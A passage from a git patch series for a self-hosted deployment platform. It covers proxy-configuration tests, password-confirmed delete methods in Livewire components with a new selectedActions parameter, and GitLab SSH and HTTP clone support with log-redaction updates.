-                                <x-forms.textarea canGate="update" :canResource="$server" useMonacoEditor
-                                    monacoEditorLanguage="yaml"
-                                    label="Configuration file ( {{ $this->configurationFilePath }} )"
-                                    name="proxySettings" id="proxySettings" rows="30" />
-                            </div>
-                        @endif
-                    </div>
+                    @if ($proxySettings)
+                        <div class="flex flex-col gap-2 pt-2">
+                            <x-forms.textarea canGate="update" :canResource="$server" useMonacoEditor
+                                monacoEditorLanguage="yaml"
+                                label="Configuration file ( {{ $this->configurationFilePath }} )"
+                                name="proxySettings" id="proxySettings" rows="30" />
+                        </div>
+                    @endif
                 </form>
             @elseif($selectedProxy === 'NONE')
                 <div class="flex items-center gap-2">
diff --git a/tests/Unit/ProxyConfigRecoveryTest.php b/tests/Unit/ProxyConfigRecoveryTest.php
new file mode 100644
index 000000000..219ec9bca
--- /dev/null
+++ b/tests/Unit/ProxyConfigRecoveryTest.php
@@ -0,0 +1,109 @@
+<?php
+
+use App\Actions\Proxy\GetProxyConfiguration;
+use Illuminate\Support\Facades\Cache;
+use Illuminate\Support\Facades\Log;
+use Spatie\SchemalessAttributes\SchemalessAttributes;
+
+beforeEach(function () {
+    Log::spy();
+    Cache::spy();
+});
+
+function mockServerWithDbConfig(?string $savedConfig): object
+{
+    $proxyAttributes = Mockery::mock(SchemalessAttributes::class);
+    $proxyAttributes->shouldReceive('get')
+        ->with('last_saved_proxy_configuration')
+        ->andReturn($savedConfig);
+
+    $server = Mockery::mock('App\Models\Server');
+    $server->shouldIgnoreMissing();
+    $server->shouldReceive('getAttribute')->with('proxy')->andReturn($proxyAttributes);
+    $server->shouldReceive('getAttribute')->with('id')->andReturn(1);
+    $server->shouldReceive('getAttribute')->with('name')->andReturn('Test Server');
+    $server->shouldReceive('proxyType')->andReturn('TRAEFIK');
+    $server->shouldReceive('proxyPath')->andReturn('/data/coolify/proxy');
+
+    return $server;
+}
+
+it('returns OK for NONE proxy type without reading config', function () {
+    $server = Mockery::mock('App\Models\Server');
+    $server->shouldIgnoreMissing();
+    $server->shouldReceive('proxyType')->andReturn('NONE');
+
+    $result = GetProxyConfiguration::run($server);
+
+    expect($result)->toBe('OK');
+});
+
+it('reads proxy configuration from database', function () {
+    $savedConfig = "services:\n  traefik:\n    image: traefik:v3.5\n";
+    $server = mockServerWithDbConfig($savedConfig);
+
+    // ProxyDashboardCacheService is called at the end — mock it
+    $server->shouldReceive('proxyType')->andReturn('TRAEFIK');
+
+    $result = GetProxyConfiguration::run($server);
+
+    expect($result)->toBe($savedConfig);
+});
+
+it('preserves full custom config including labels, env vars, and custom commands', function () {
+    $customConfig = <<<'YAML'
+services:
+  traefik:
+    image: traefik:v3.5
+    command:
+      - '--entrypoints.http.address=:80'
+      - '--metrics.prometheus=true'
+    labels:
+      - 'traefik.enable=true'
+      - 'waf.custom.middleware=true'
+    environment:
+      CF_API_EMAIL: user@example.com
+      CF_API_KEY: secret-key
+YAML;
+
+    $server = mockServerWithDbConfig($customConfig);
+
+    $result = GetProxyConfiguration::run($server);
+
+    expect($result)->toBe($customConfig)
+        ->and($result)->toContain('waf.custom.middleware=true')
+        ->and($result)->toContain('CF_API_EMAIL')
+        ->and($result)->toContain('metrics.prometheus=true');
+});
+
+it('logs warning when regenerating defaults', function () {
+    Log::swap(new \Illuminate\Log\LogManager(app()));
+    Log::spy();
+
+    // No DB config, no disk config — will try to regenerate
+    $server = mockServerWithDbConfig(null);
+
+    // backfillFromDisk will be called — we need instant_remote_process to return empty
+    // Since it's a global function we can't easily mock it, so test the logging via
+    // the force regenerate path instead
+    try {
+        GetProxyConfiguration::run($server, forceRegenerate: true);
+    } catch (\Throwable $e) {
+        // generateDefaultProxyConfiguration may fail without full server setup
+    }
+
+    Log::shouldHaveReceived('warning')
+        ->withArgs(fn ($message) => str_contains($message, 'regenerated to defaults'))
+        ->once();
+});
+
+it('does not read from disk when DB config exists', function () {
+    $savedConfig = "services:\n  traefik:\n    image: traefik:v3.5\n";
+    $server = mockServerWithDbConfig($savedConfig);
+
+    // If disk were read, instant_remote_process would be called.
+    // Since we're not mocking it and the test passes, it proves DB is used.
+    $result = GetProxyConfiguration::run($server);
+
+    expect($result)->toBe($savedConfig);
+});

From 8366e150b14858af722be11b077a45c8bacc0d96 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Wed, 11 Mar 2026 15:04:45 +0100
Subject: [PATCH 039/213] feat(livewire): add selectedActions parameter and
 error handling to delete methods

- Add `$selectedActions = []` parameter to delete/remove methods in multiple
  Livewire components to support optional deletion actions
- Return error message string when password verification fails instead of
  silent return
- Return `true` on successful deletion to indicate completion
- Handle selectedActions to set component properties for cascading deletions
  (delete_volumes, delete_networks, delete_configurations, docker_cleanup)
- Add test coverage for Danger component delete functionality with password
  validation and selected actions handling
---
 app/Livewire/NavbarDeleteTeam.php             |  4 +-
 app/Livewire/Project/Database/BackupEdit.php  |  4 +-
 .../Project/Database/BackupExecutions.php     |  8 +-
 app/Livewire/Project/Service/FileStorage.php  |  6 +-
 app/Livewire/Project/Service/Index.php        |  8 +-
 app/Livewire/Project/Shared/Danger.php        | 13 ++-
 app/Livewire/Project/Shared/Destination.php   |  6 +-
 app/Livewire/Project/Shared/Storages/Show.php |  6 +-
 app/Livewire/Server/Delete.php                |  8 +-
 .../Server/Security/TerminalAccess.php        |  6 +-
 app/Livewire/Team/AdminView.php               |  6 +-
 tests/v4/Feature/DangerDeleteResourceTest.php | 81 +++++++++++++++++++
 12 files changed, 130 insertions(+), 26 deletions(-)
 create mode 100644 tests/v4/Feature/DangerDeleteResourceTest.php

diff --git a/app/Livewire/NavbarDeleteTeam.php b/app/Livewire/NavbarDeleteTeam.php
index a8c932912..8e5478b5e 100644
--- a/app/Livewire/NavbarDeleteTeam.php
+++ b/app/Livewire/NavbarDeleteTeam.php
@@ -15,10 +15,10 @@ public function mount()
         $this->team = currentTeam()->name;
     }
 
-    public function delete($password)
+    public function delete($password, $selectedActions = [])
     {
         if (! verifyPasswordConfirmation($password, $this)) {
-            return;
+            return 'The provided password is incorrect.';
         }
 
         $currentTeam = currentTeam();
diff --git a/app/Livewire/Project/Database/BackupEdit.php b/app/Livewire/Project/Database/BackupEdit.php
index 35262d7b0..c24e2a3f1 100644
--- a/app/Livewire/Project/Database/BackupEdit.php
+++ b/app/Livewire/Project/Database/BackupEdit.php
@@ -146,12 +146,12 @@ public function syncData(bool $toModel = false)
         }
     }
 
-    public function delete($password)
+    public function delete($password, $selectedActions = [])
     {
         $this->authorize('manageBackups', $this->backup->database);
 
         if (! verifyPasswordConfirmation($password, $this)) {
-            return;
+            return 'The provided password is incorrect.';
         }
 
         try {
diff --git a/app/Livewire/Project/Database/BackupExecutions.php b/app/Livewire/Project/Database/BackupExecutions.php
index 44f903fcc..1dd93781d 100644
--- a/app/Livewire/Project/Database/BackupExecutions.php
+++ b/app/Livewire/Project/Database/BackupExecutions.php
@@ -65,10 +65,10 @@ public function cleanupDeleted()
         }
     }
 
-    public function deleteBackup($executionId, $password)
+    public function deleteBackup($executionId, $password, $selectedActions = [])
     {
         if (! verifyPasswordConfirmation($password, $this)) {
-            return;
+            return 'The provided password is incorrect.';
         }
 
         $execution = $this->backup->executions()->where('id', $executionId)->first();
@@ -96,7 +96,11 @@ public function deleteBackup($executionId, $password)
             $this->refreshBackupExecutions();
         } catch (\Exception $e) {
             $this->dispatch('error', 'Failed to delete backup: '.$e->getMessage());
+
+            return true;
         }
+
+        return true;
     }
 
     public function download_file($exeuctionId)
diff --git a/app/Livewire/Project/Service/FileStorage.php b/app/Livewire/Project/Service/FileStorage.php
index 079115bb6..5d948bffd 100644
--- a/app/Livewire/Project/Service/FileStorage.php
+++ b/app/Livewire/Project/Service/FileStorage.php
@@ -134,12 +134,12 @@ public function convertToFile()
         }
     }
 
-    public function delete($password)
+    public function delete($password, $selectedActions = [])
     {
         $this->authorize('update', $this->resource);
 
         if (! verifyPasswordConfirmation($password, $this)) {
-            return;
+            return 'The provided password is incorrect.';
         }
 
         try {
@@ -158,6 +158,8 @@ public function delete($password)
         } finally {
             $this->dispatch('refreshStorages');
         }
+
+        return true;
     }
 
     public function submit()
diff --git a/app/Livewire/Project/Service/Index.php b/app/Livewire/Project/Service/Index.php
index b735d7e71..c77a3a516 100644
--- a/app/Livewire/Project/Service/Index.php
+++ b/app/Livewire/Project/Service/Index.php
@@ -194,13 +194,13 @@ public function refreshFileStorages()
         }
     }
 
-    public function deleteDatabase($password)
+    public function deleteDatabase($password, $selectedActions = [])
     {
         try {
             $this->authorize('delete', $this->serviceDatabase);
 
             if (! verifyPasswordConfirmation($password, $this)) {
-                return;
+                return 'The provided password is incorrect.';
             }
 
             $this->serviceDatabase->delete();
@@ -398,13 +398,13 @@ public function instantSaveApplicationAdvanced()
         }
     }
 
-    public function deleteApplication($password)
+    public function deleteApplication($password, $selectedActions = [])
     {
         try {
             $this->authorize('delete', $this->serviceApplication);
 
             if (! verifyPasswordConfirmation($password, $this)) {
-                return;
+                return 'The provided password is incorrect.';
             }
 
             $this->serviceApplication->delete();
diff --git a/app/Livewire/Project/Shared/Danger.php b/app/Livewire/Project/Shared/Danger.php
index e9c18cc8d..caaabc494 100644
--- a/app/Livewire/Project/Shared/Danger.php
+++ b/app/Livewire/Project/Shared/Danger.php
@@ -88,16 +88,21 @@ public function mount()
         }
     }
 
-    public function delete($password)
+    public function delete($password, $selectedActions = [])
     {
         if (! verifyPasswordConfirmation($password, $this)) {
-            return;
+            return 'The provided password is incorrect.';
         }
 
         if (! $this->resource) {
-            $this->addError('resource', 'Resource not found.');
+            return 'Resource not found.';
+        }
 
-            return;
+        if (! empty($selectedActions)) {
+            $this->delete_volumes = in_array('delete_volumes', $selectedActions);
+            $this->delete_connected_networks = in_array('delete_connected_networks', $selectedActions);
+            $this->delete_configurations = in_array('delete_configurations', $selectedActions);
+            $this->docker_cleanup = in_array('docker_cleanup', $selectedActions);
         }
 
         try {
diff --git a/app/Livewire/Project/Shared/Destination.php b/app/Livewire/Project/Shared/Destination.php
index 7ab81b7d1..363471760 100644
--- a/app/Livewire/Project/Shared/Destination.php
+++ b/app/Livewire/Project/Shared/Destination.php
@@ -134,11 +134,11 @@ public function addServer(int $network_id, int $server_id)
         $this->dispatch('refresh');
     }
 
-    public function removeServer(int $network_id, int $server_id, $password)
+    public function removeServer(int $network_id, int $server_id, $password, $selectedActions = [])
     {
         try {
             if (! verifyPasswordConfirmation($password, $this)) {
-                return;
+                return 'The provided password is incorrect.';
             }
 
             if ($this->resource->destination->server->id == $server_id && $this->resource->destination->id == $network_id) {
@@ -152,6 +152,8 @@ public function removeServer(int $network_id, int $server_id, $password)
             $this->loadData();
             $this->dispatch('refresh');
             ApplicationStatusChanged::dispatch(data_get($this->resource, 'environment.project.team.id'));
+
+            return true;
         } catch (\Exception $e) {
             return handleError($e, $this);
         }
diff --git a/app/Livewire/Project/Shared/Storages/Show.php b/app/Livewire/Project/Shared/Storages/Show.php
index 2091eca14..69395a591 100644
--- a/app/Livewire/Project/Shared/Storages/Show.php
+++ b/app/Livewire/Project/Shared/Storages/Show.php
@@ -77,15 +77,17 @@ public function submit()
         $this->dispatch('success', 'Storage updated successfully');
     }
 
-    public function delete($password)
+    public function delete($password, $selectedActions = [])
     {
         $this->authorize('update', $this->resource);
 
         if (! verifyPasswordConfirmation($password, $this)) {
-            return;
+            return 'The provided password is incorrect.';
         }
 
         $this->storage->delete();
         $this->dispatch('refreshStorages');
+
+        return true;
     }
 }
diff --git a/app/Livewire/Server/Delete.php b/app/Livewire/Server/Delete.php
index e7b64b805..beb8c0a12 100644
--- a/app/Livewire/Server/Delete.php
+++ b/app/Livewire/Server/Delete.php
@@ -24,10 +24,14 @@ public function mount(string $server_uuid)
         }
     }
 
-    public function delete($password)
+    public function delete($password, $selectedActions = [])
     {
         if (! verifyPasswordConfirmation($password, $this)) {
-            return;
+            return 'The provided password is incorrect.';
+        }
+
+        if (! empty($selectedActions)) {
+            $this->delete_from_hetzner = in_array('delete_from_hetzner', $selectedActions);
         }
         try {
             $this->authorize('delete', $this->server);
diff --git a/app/Livewire/Server/Security/TerminalAccess.php b/app/Livewire/Server/Security/TerminalAccess.php
index 310edcfe4..b4b99a3e7 100644
--- a/app/Livewire/Server/Security/TerminalAccess.php
+++ b/app/Livewire/Server/Security/TerminalAccess.php
@@ -31,7 +31,7 @@ public function mount(string $server_uuid)
         }
     }
 
-    public function toggleTerminal($password)
+    public function toggleTerminal($password, $selectedActions = [])
     {
         try {
             $this->authorize('update', $this->server);
@@ -43,7 +43,7 @@ public function toggleTerminal($password)
 
             // Verify password
             if (! verifyPasswordConfirmation($password, $this)) {
-                return;
+                return 'The provided password is incorrect.';
             }
 
             // Toggle the terminal setting
@@ -55,6 +55,8 @@ public function toggleTerminal($password)
 
             $status = $this->isTerminalEnabled ? 'enabled' : 'disabled';
             $this->dispatch('success', "Terminal access has been {$status}.");
+
+            return true;
         } catch (\Throwable $e) {
             return handleError($e, $this);
         }
diff --git a/app/Livewire/Team/AdminView.php b/app/Livewire/Team/AdminView.php
index c8d44d42b..09878f27b 100644
--- a/app/Livewire/Team/AdminView.php
+++ b/app/Livewire/Team/AdminView.php
@@ -49,14 +49,14 @@ public function getUsers()
         }
     }
 
-    public function delete($id, $password)
+    public function delete($id, $password, $selectedActions = [])
     {
         if (! isInstanceAdmin()) {
             return redirect()->route('dashboard');
         }
 
         if (! verifyPasswordConfirmation($password, $this)) {
-            return;
+            return 'The provided password is incorrect.';
         }
 
         if (! auth()->user()->isInstanceAdmin()) {
@@ -71,6 +71,8 @@ public function delete($id, $password)
         try {
             $user->delete();
             $this->getUsers();
+
+            return true;
         } catch (\Exception $e) {
             return $this->dispatch('error', $e->getMessage());
         }
diff --git a/tests/v4/Feature/DangerDeleteResourceTest.php b/tests/v4/Feature/DangerDeleteResourceTest.php
new file mode 100644
index 000000000..7a73f5979
--- /dev/null
+++ b/tests/v4/Feature/DangerDeleteResourceTest.php
@@ -0,0 +1,81 @@
+<?php
+
+use App\Livewire\Project\Shared\Danger;
+use App\Models\Application;
+use App\Models\Environment;
+use App\Models\InstanceSettings;
+use App\Models\Project;
+use App\Models\Server;
+use App\Models\StandaloneDocker;
+use App\Models\Team;
+use App\Models\User;
+use Illuminate\Foundation\Testing\RefreshDatabase;
+use Illuminate\Support\Facades\Hash;
+use Illuminate\Support\Facades\Queue;
+use Illuminate\Support\Facades\Route;
+use Livewire\Livewire;
+
+uses(RefreshDatabase::class);
+
+beforeEach(function () {
+    InstanceSettings::create(['id' => 0]);
+    Queue::fake();
+
+    $this->user = User::factory()->create([
+        'password' => Hash::make('test-password'),
+    ]);
+    $this->team = Team::factory()->create();
+    $this->user->teams()->attach($this->team, ['role' => 'owner']);
+
+    $this->server = Server::factory()->create(['team_id' => $this->team->id]);
+    $this->destination = StandaloneDocker::factory()->create([
+        'server_id' => $this->server->id,
+        'network' => 'test-network-'.fake()->unique()->word(),
+    ]);
+    $this->project = Project::factory()->create(['team_id' => $this->team->id]);
+    $this->environment = Environment::factory()->create(['project_id' => $this->project->id]);
+
+    $this->application = Application::factory()->create([
+        'environment_id' => $this->environment->id,
+        'destination_id' => $this->destination->id,
+        'destination_type' => $this->destination->getMorphClass(),
+    ]);
+
+    $this->actingAs($this->user);
+    session(['currentTeam' => $this->team]);
+
+    // Bind route parameters so get_route_parameters() works in the Danger component
+    $route = Route::get('/test/{project_uuid}/{environment_uuid}', fn () => '')->name('test.danger');
+    $request = Request::create("/test/{$this->project->uuid}/{$this->environment->uuid}");
+    $route->bind($request);
+    app('router')->setRoutes(app('router')->getRoutes());
+    Route::dispatch($request);
+});
+
+test('delete returns error string when password is incorrect', function () {
+    Livewire::test(Danger::class, ['resource' => $this->application])
+        ->call('delete', 'wrong-password')
+        ->assertReturned('The provided password is incorrect.');
+
+    // Resource should NOT be deleted
+    expect(Application::find($this->application->id))->not->toBeNull();
+});
+
+test('delete succeeds with correct password and redirects', function () {
+    Livewire::test(Danger::class, ['resource' => $this->application])
+        ->call('delete', 'test-password')
+        ->assertHasNoErrors();
+
+    // Resource should be soft-deleted
+    expect(Application::find($this->application->id))->toBeNull();
+});
+
+test('delete applies selectedActions from checkbox state', function () {
+    $component = Livewire::test(Danger::class, ['resource' => $this->application])
+        ->call('delete', 'test-password', ['delete_configurations', 'docker_cleanup']);
+
+    expect($component->get('delete_volumes'))->toBeFalse();
+    expect($component->get('delete_connected_networks'))->toBeFalse();
+    expect($component->get('delete_configurations'))->toBeTrue();
+    expect($component->get('docker_cleanup'))->toBeTrue();
+});

From b2135bb4fa028d1cb9de166d72c058c605599974 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Wed, 11 Mar 2026 15:30:46 +0100
Subject: [PATCH 040/213] feat(gitlab): add GitLab source integration with SSH
 and HTTP basic auth

Add full GitLab application source support for git operations:
- Implement SSH-based authentication using private keys with configurable ports
- Support HTTP basic auth for HTTPS GitLab URLs (with or without deploy keys)
- Handle private key setup and SSH command configuration in both Docker and local modes
- Support merge request checkouts for GitLab with SSH authentication

Improvements to credential handling:
- URL-encode GitHub access tokens to handle special characters properly
- Update log sanitization to redact passwords from HTTPS/HTTP URLs
- Extend convertGitUrl() type hints to support GitlabApp sources

Add test coverage and seed data:
- New GitlabSourceCommandsTest with tests for private key and public repo scenarios
- Test for HTTPS basic auth password sanitization in logs
- Seed data for GitLab deploy key and public example applications
---
 app/Models/Application.php                    | 137 +++++++++++++++++-
 bootstrap/helpers/remoteProcess.php           |   4 +-
 bootstrap/helpers/shared.php                  |   4 +-
 database/seeders/ApplicationSeeder.php        |  32 ++++
 .../seeders/ApplicationSettingsSeeder.php     |   7 +
 tests/Unit/GitlabSourceCommandsTest.php       |  91 ++++++++++++
 tests/Unit/SanitizeLogsForExportTest.php      |  16 ++
 7 files changed, 284 insertions(+), 7 deletions(-)
 create mode 100644 tests/Unit/GitlabSourceCommandsTest.php

diff --git a/app/Models/Application.php b/app/Models/Application.php
index 34ab4141e..7b46b6f3d 100644
--- a/app/Models/Application.php
+++ b/app/Models/Application.php
@@ -1163,14 +1163,15 @@ public function generateGitLsRemoteCommands(string $deployment_uuid, bool $exec_
                     $base_command = "{$base_command} {$escapedRepoUrl}";
                 } else {
                     $github_access_token = generateGithubInstallationToken($this->source);
+                    $encodedToken = rawurlencode($github_access_token);
 
                     if ($exec_in_docker) {
-                        $repoUrl = "$source_html_url_scheme://x-access-token:$github_access_token@$source_html_url_host/{$customRepository}.git";
+                        $repoUrl = "$source_html_url_scheme://x-access-token:$encodedToken@$source_html_url_host/{$customRepository}.git";
                         $escapedRepoUrl = escapeshellarg($repoUrl);
                         $base_command = "{$base_command} {$escapedRepoUrl}";
                         $fullRepoUrl = $repoUrl;
                     } else {
-                        $repoUrl = "$source_html_url_scheme://x-access-token:$github_access_token@$source_html_url_host/{$customRepository}";
+                        $repoUrl = "$source_html_url_scheme://x-access-token:$encodedToken@$source_html_url_host/{$customRepository}";
                         $escapedRepoUrl = escapeshellarg($repoUrl);
                         $base_command = "{$base_command} {$escapedRepoUrl}";
                         $fullRepoUrl = $repoUrl;
@@ -1189,6 +1190,62 @@ public function generateGitLsRemoteCommands(string $deployment_uuid, bool $exec_
                     'fullRepoUrl' => $fullRepoUrl,
                 ];
             }
+
+            if ($this->source->getMorphClass() === \App\Models\GitlabApp::class) {
+                $gitlabSource = $this->source;
+                $private_key = data_get($gitlabSource, 'privateKey.private_key');
+
+                if ($private_key) {
+                    $fullRepoUrl = $customRepository;
+                    $private_key = base64_encode($private_key);
+                    $gitlabPort = $gitlabSource->custom_port ?? 22;
+                    $escapedCustomRepository = str_replace("'", "'\\''", $customRepository);
+                    $base_command = "GIT_SSH_COMMAND=\"ssh -o ConnectTimeout=30 -p {$gitlabPort} -o Port={$gitlabPort} -o LogLevel=ERROR -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -i /root/.ssh/id_rsa\" {$base_command} '{$escapedCustomRepository}'";
+
+                    if ($exec_in_docker) {
+                        $commands = collect([
+                            executeInDocker($deployment_uuid, 'mkdir -p /root/.ssh'),
+                            executeInDocker($deployment_uuid, "echo '{$private_key}' | base64 -d | tee /root/.ssh/id_rsa > /dev/null"),
+                            executeInDocker($deployment_uuid, 'chmod 600 /root/.ssh/id_rsa'),
+                        ]);
+                    } else {
+                        $commands = collect([
+                            'mkdir -p /root/.ssh',
+                            "echo '{$private_key}' | base64 -d | tee /root/.ssh/id_rsa > /dev/null",
+                            'chmod 600 /root/.ssh/id_rsa',
+                        ]);
+                    }
+
+                    if ($exec_in_docker) {
+                        $commands->push(executeInDocker($deployment_uuid, $base_command));
+                    } else {
+                        $commands->push($base_command);
+                    }
+
+                    return [
+                        'commands' => $commands->implode(' && '),
+                        'branch' => $branch,
+                        'fullRepoUrl' => $fullRepoUrl,
+                    ];
+                }
+
+                // GitLab source without private key — use URL as-is (supports user-embedded basic auth)
+                $fullRepoUrl = $customRepository;
+                $escapedCustomRepository = escapeshellarg($customRepository);
+                $base_command = "{$base_command} {$escapedCustomRepository}";
+
+                if ($exec_in_docker) {
+                    $commands->push(executeInDocker($deployment_uuid, $base_command));
+                } else {
+                    $commands->push($base_command);
+                }
+
+                return [
+                    'commands' => $commands->implode(' && '),
+                    'branch' => $branch,
+                    'fullRepoUrl' => $fullRepoUrl,
+                ];
+            }
         }
 
         if ($this->deploymentType() === 'deploy_key') {
@@ -1301,13 +1358,14 @@ public function generateGitImportCommands(string $deployment_uuid, int $pull_req
                     }
                 } else {
                     $github_access_token = generateGithubInstallationToken($this->source);
+                    $encodedToken = rawurlencode($github_access_token);
                     if ($exec_in_docker) {
-                        $repoUrl = "$source_html_url_scheme://x-access-token:$github_access_token@$source_html_url_host/{$customRepository}.git";
+                        $repoUrl = "$source_html_url_scheme://x-access-token:$encodedToken@$source_html_url_host/{$customRepository}.git";
                         $escapedRepoUrl = escapeshellarg($repoUrl);
                         $git_clone_command = "{$git_clone_command} {$escapedRepoUrl} {$escapedBaseDir}";
                         $fullRepoUrl = $repoUrl;
                     } else {
-                        $repoUrl = "$source_html_url_scheme://x-access-token:$github_access_token@$source_html_url_host/{$customRepository}";
+                        $repoUrl = "$source_html_url_scheme://x-access-token:$encodedToken@$source_html_url_host/{$customRepository}";
                         $escapedRepoUrl = escapeshellarg($repoUrl);
                         $git_clone_command = "{$git_clone_command} {$escapedRepoUrl} {$escapedBaseDir}";
                         $fullRepoUrl = $repoUrl;
@@ -1339,6 +1397,77 @@ public function generateGitImportCommands(string $deployment_uuid, int $pull_req
                     'fullRepoUrl' => $fullRepoUrl,
                 ];
             }
+
+            if ($this->source->getMorphClass() === \App\Models\GitlabApp::class) {
+                $gitlabSource = $this->source;
+                $private_key = data_get($gitlabSource, 'privateKey.private_key');
+
+                if ($private_key) {
+                    $fullRepoUrl = $customRepository;
+                    $private_key = base64_encode($private_key);
+                    $gitlabPort = $gitlabSource->custom_port ?? 22;
+                    $escapedCustomRepository = escapeshellarg($customRepository);
+                    $git_clone_command_base = "GIT_SSH_COMMAND=\"ssh -o ConnectTimeout=30 -p {$gitlabPort} -o Port={$gitlabPort} -o LogLevel=ERROR -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -i /root/.ssh/id_rsa\" {$git_clone_command} {$escapedCustomRepository} {$escapedBaseDir}";
+                    if ($only_checkout) {
+                        $git_clone_command = $git_clone_command_base;
+                    } else {
+                        $git_clone_command = $this->setGitImportSettings($deployment_uuid, $git_clone_command_base, commit: $commit);
+                    }
+                    if ($exec_in_docker) {
+                        $commands = collect([
+                            executeInDocker($deployment_uuid, 'mkdir -p /root/.ssh'),
+                            executeInDocker($deployment_uuid, "echo '{$private_key}' | base64 -d | tee /root/.ssh/id_rsa > /dev/null"),
+                            executeInDocker($deployment_uuid, 'chmod 600 /root/.ssh/id_rsa'),
+                        ]);
+                    } else {
+                        $commands = collect([
+                            'mkdir -p /root/.ssh',
+                            "echo '{$private_key}' | base64 -d | tee /root/.ssh/id_rsa > /dev/null",
+                            'chmod 600 /root/.ssh/id_rsa',
+                        ]);
+                    }
+
+                    if ($pull_request_id !== 0) {
+                        $branch = "merge-requests/{$pull_request_id}/head:$pr_branch_name";
+                        if ($exec_in_docker) {
+                            $commands->push(executeInDocker($deployment_uuid, "echo 'Checking out $branch'"));
+                        } else {
+                            $commands->push("echo 'Checking out $branch'");
+                        }
+                        $git_clone_command = "{$git_clone_command} && cd {$escapedBaseDir} && GIT_SSH_COMMAND=\"ssh -o ConnectTimeout=30 -p {$gitlabPort} -o Port={$gitlabPort} -o LogLevel=ERROR -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -i /root/.ssh/id_rsa\" git fetch origin $branch && ".$this->buildGitCheckoutCommand($pr_branch_name);
+                    }
+
+                    if ($exec_in_docker) {
+                        $commands->push(executeInDocker($deployment_uuid, $git_clone_command));
+                    } else {
+                        $commands->push($git_clone_command);
+                    }
+
+                    return [
+                        'commands' => $commands->implode(' && '),
+                        'branch' => $branch,
+                        'fullRepoUrl' => $fullRepoUrl,
+                    ];
+                }
+
+                // GitLab source without private key — use URL as-is (supports user-embedded basic auth)
+                $fullRepoUrl = $customRepository;
+                $escapedCustomRepository = escapeshellarg($customRepository);
+                $git_clone_command = "{$git_clone_command} {$escapedCustomRepository} {$escapedBaseDir}";
+                $git_clone_command = $this->setGitImportSettings($deployment_uuid, $git_clone_command, public: true, commit: $commit);
+
+                if ($exec_in_docker) {
+                    $commands->push(executeInDocker($deployment_uuid, $git_clone_command));
+                } else {
+                    $commands->push($git_clone_command);
+                }
+
+                return [
+                    'commands' => $commands->implode(' && '),
+                    'branch' => $branch,
+                    'fullRepoUrl' => $fullRepoUrl,
+                ];
+            }
         }
         if ($this->deploymentType() === 'deploy_key') {
             $fullRepoUrl = $customRepository;
diff --git a/bootstrap/helpers/remoteProcess.php b/bootstrap/helpers/remoteProcess.php
index 217c82929..f819df380 100644
--- a/bootstrap/helpers/remoteProcess.php
+++ b/bootstrap/helpers/remoteProcess.php
@@ -275,9 +275,9 @@ function remove_iip($text)
     // ANSI color codes
     $text = preg_replace('/\x1b\[[0-9;]*m/', '', $text);
 
-    // Generic URLs with passwords (covers database URLs, ftp, amqp, ssh, etc.)
+    // Generic URLs with passwords (covers database URLs, ftp, amqp, ssh, git basic auth, etc.)
     // (protocol://user:password@host → protocol://user:<REDACTED>@host)
-    $text = preg_replace('/((?:postgres|mysql|mongodb|rediss?|mariadb|ftp|sftp|ssh|amqp|amqps|ldap|ldaps|s3):\/\/[^:]+:)[^@]+(@)/i', '$1'.REDACTED.'$2', $text);
+    $text = preg_replace('/((?:https?|postgres|mysql|mongodb|rediss?|mariadb|ftp|sftp|ssh|amqp|amqps|ldap|ldaps|s3):\/\/[^:]+:)[^@]+(@)/i', '$1'.REDACTED.'$2', $text);
 
     // Email addresses
     $text = preg_replace('/[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}/', REDACTED, $text);
diff --git a/bootstrap/helpers/shared.php b/bootstrap/helpers/shared.php
index ce40466b2..b58f2ab7f 100644
--- a/bootstrap/helpers/shared.php
+++ b/bootstrap/helpers/shared.php
@@ -8,6 +8,7 @@
 use App\Models\ApplicationPreview;
 use App\Models\EnvironmentVariable;
 use App\Models\GithubApp;
+use App\Models\GitlabApp;
 use App\Models\InstanceSettings;
 use App\Models\LocalFileVolume;
 use App\Models\LocalPersistentVolume;
@@ -3522,7 +3523,7 @@ function defaultNginxConfiguration(string $type = 'static'): string
     }
 }
 
-function convertGitUrl(string $gitRepository, string $deploymentType, ?GithubApp $source = null): array
+function convertGitUrl(string $gitRepository, string $deploymentType, GithubApp|GitlabApp|null $source = null): array
 {
     $repository = $gitRepository;
     $providerInfo = [
@@ -3542,6 +3543,7 @@ function convertGitUrl(string $gitRepository, string $deploymentType, ?GithubApp
         // Let's try and fix that for known Git providers
         switch ($source->getMorphClass()) {
             case \App\Models\GithubApp::class:
+            case \App\Models\GitlabApp::class:
                 $providerInfo['host'] = Url::fromString($source->html_url)->getHost();
                 $providerInfo['port'] = $source->custom_port;
                 $providerInfo['user'] = $source->custom_user;
diff --git a/database/seeders/ApplicationSeeder.php b/database/seeders/ApplicationSeeder.php
index 18ffbe166..70fb13a0d 100644
--- a/database/seeders/ApplicationSeeder.php
+++ b/database/seeders/ApplicationSeeder.php
@@ -4,6 +4,7 @@
 
 use App\Models\Application;
 use App\Models\GithubApp;
+use App\Models\GitlabApp;
 use App\Models\StandaloneDocker;
 use Illuminate\Database\Seeder;
 
@@ -98,5 +99,36 @@ public function run(): void
 CMD ["sh", "-c", "echo Crashing in 5 seconds... && sleep 5 && exit 1"]
 ',
         ]);
+        Application::create([
+            'uuid' => 'gitlab-deploy-key',
+            'name' => 'GitLab Deploy Key Example',
+            'fqdn' => 'http://gitlab-deploy-key.127.0.0.1.sslip.io',
+            'git_repository' => 'git@gitlab.com:coollabsio/php-example.git',
+            'git_branch' => 'main',
+            'build_pack' => 'nixpacks',
+            'ports_exposes' => '80',
+            'environment_id' => 1,
+            'destination_id' => 0,
+            'destination_type' => StandaloneDocker::class,
+            'source_id' => 1,
+            'source_type' => GitlabApp::class,
+            'private_key_id' => 1,
+        ]);
+        Application::create([
+            'uuid' => 'gitlab-public-example',
+            'name' => 'GitLab Public Example',
+            'fqdn' => 'http://gitlab-public.127.0.0.1.sslip.io',
+            'git_repository' => 'https://gitlab.com/andrasbacsai/coolify-examples.git',
+            'base_directory' => '/astro/static',
+            'publish_directory' => '/dist',
+            'git_branch' => 'main',
+            'build_pack' => 'nixpacks',
+            'ports_exposes' => '80',
